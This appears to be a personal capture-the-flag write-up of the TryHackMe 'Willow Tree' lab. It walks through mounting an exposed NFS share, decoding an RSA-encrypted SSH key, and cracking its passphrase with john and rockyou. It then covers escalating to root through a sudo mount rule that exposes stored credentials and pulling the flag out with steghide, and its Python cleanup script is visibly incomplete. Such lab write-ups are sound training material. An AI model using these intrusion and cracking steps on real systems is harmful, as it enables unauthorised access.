What lies under the Willow Tree?

This one is Medium rated with no hints. Let’s begin.


nmap says we’ve got four ports: 22 (SSH), 80 (HTTP), 111 (RPCBind) and 2049 (NFS). So that’s interesting.


Let’s go check out the NFS share.

mkdir mountpoint mount -t nfs ./mountpoint/

In the mount we have a file; rsa_keys. In that, we get this:

Public Key Pair: (23, 37627)
Private Key Pair: (61527, 37627)

And that’s all we’ve got to go on. But, it’s a start.


On the website, all we get is a big old bunch of numbers, i.e:

4865792057696c6c6f772c2068657265277320796f75722053534820507 snip

Actually if we look closely, the first bit is different - it’s hexadecimal. That decodes to:

Hey Willow, here’s your SSH Private key – you know where the decryption key is!.

So presumably the rest of it (and there is a lot) is the SSH key, encoded with RSA….


Edit: after I was done with this, I went and checked some other writeups. Turns out the whole thing was hex and I could’ve saved myself some messing about by just hex decoding the whole lot right away. But, I didn’t realise that at the time and ended up working a bit harder and dumber. Lol. Here’s what I did:

So we’ve got e, d and n for our RSA decryption, but the cipher won’t decode nicely just the way it is. There may be some simple way around this, but for me it was just looking at the data and trying to figure out what was going on. It helps knowing that an RSA private key begins with


and ends with


I tried encoding a few of these characters to find out what they were supposed to encode to, and that helped.

Eventually I figured out that we had a bunch of extra 3’s in there. In fact, just about every second character was a superfluous ‘3’. Stripping those out got us close, but not all the way there. We also had a bunch of extra zeros; usually every fifth character but not always. Sort of like a reversed evil FizzBuzz. In the end I wrote some python code to clean up the cipher:

stripped = ''
timesincelast = 0

with open('ciper.txt', 'r') as f:
    data =
    data_as_str = str(data)
for index,char in enumerate(data_as_str):
    if index % 2 != 0:
        stripped += char
for index, char in enumerate(stripped):
        if index - 1 < len(stripped):
            next = stripped[(index + 1)]
            if char == '0' and next != '0' and timesincelast > 3:
                print (' ', end='')
                timesincelast = 0
                print(char, end='')
                timesincelast += 1


Once I had the cleaned up ciper I dropped it into this website and got out an encoded SSH key. John can deal with that:

root@kali:/opt/tryhackme/willow# python /usr/share/john/ id_rsa_enc > id_rsa_john  
root@kali:/opt/tryhackme/willow# john id_rsa_john -w=/usr/share/wordlists/rockyou.txt  
Warning: UTF-8 seen reading id_rsa_john  
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])  
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes  
Cost 2 (iteration count) is 1 for all loaded hashes  
Will run 4 OpenMP threads  
Note: This format may emit false positives, so it will keep trying even after  
finding a possible candidate.  
Press 'q' or Ctrl-C to abort, almost any other key for status  
REDACTED       (id_rsa_enc)  


With this information and the chmodded key we can log in as Willow. The user flag is in a jpg, so we can’t easily view it through SSH. Hmmmm.

Fortunately, we can grab it with scp:

root@kali:/opt/tryhackme/willow# scp -i id_rsa_enc willow@ user.jpg

And then we can view the file and get the flag. Next, let’s see what Willow can do back on the box:

willow@willow-tree:~$ sudo -l  
Matching Defaults entries for willow on willow-tree:  
    env_reset, mail_badpass,   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin  

User willow may run the following commands on willow-tree:  
    (ALL : ALL) NOPASSWD: /bin/mount /dev/*  


Checking in /dev/, we can find an interesting directory. Let’s check it out:

willow@willow-tree:/dev/shm$ mkdir /tmp/mnt  
willow@willow-tree:/dev/shm$ sudo mount /dev/hidden_backup /tmp/mnt  
willow@willow-tree:/dev/shm$ cd /tmp/mnt/  
willow@willow-tree:/tmp/mnt$ ls -lash  
total 6.0K  
1.0K drwxr-xr-x  2 root root 1.0K Jan 30  2020 .  
4.0K drwxrwxrwt 11 root root 4.0K Aug  8 13:36 ..  
1.0K -rw-r--r--  1 root root   42 Jan 30  2020 creds.txt  
willow@willow-tree:/tmp/mnt$ cat creds.txt  

Cool, let’s do su root and grab the flag!

root@willow-tree:~# cat root.txt
This would be too easy, dont you think? I actually gave you the root flag some time ago.
Youve got my password now -- go find your flag!

Wait, what? Haha…what could that mean?

root@kali:/opt/tryhackme/willow# steghide extract -sf user.jpg 
Enter passphrase: 
wrote extracted data to "root.txt".

And that’s where the flag was!

What a cracking box, I enjoyed this one. Thanks MuirlandOracle.